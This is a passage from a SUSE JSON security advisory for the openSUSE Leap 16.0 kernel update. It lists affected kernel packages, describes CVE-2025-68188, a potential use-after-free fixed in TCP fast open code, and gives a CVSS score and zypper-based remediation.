"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68178"
},
{
"cve": "CVE-2025-68188",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68188"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntcp: use dst_dev_rcu() in tcp_fastopen_active_disable_ofo_check()\n\nUse RCU to avoid a pair of atomic operations and a potential\nUAF on dst_dev()-\u003eflags.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68188",
"url": "https://www.suse.com/security/cve/CVE-2025-68188"
},
{
"category": "external",
"summary": "SUSE Bug 1255269 for CVE-2025-68188",
"url": "https://bugzilla.suse.com/1255269"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
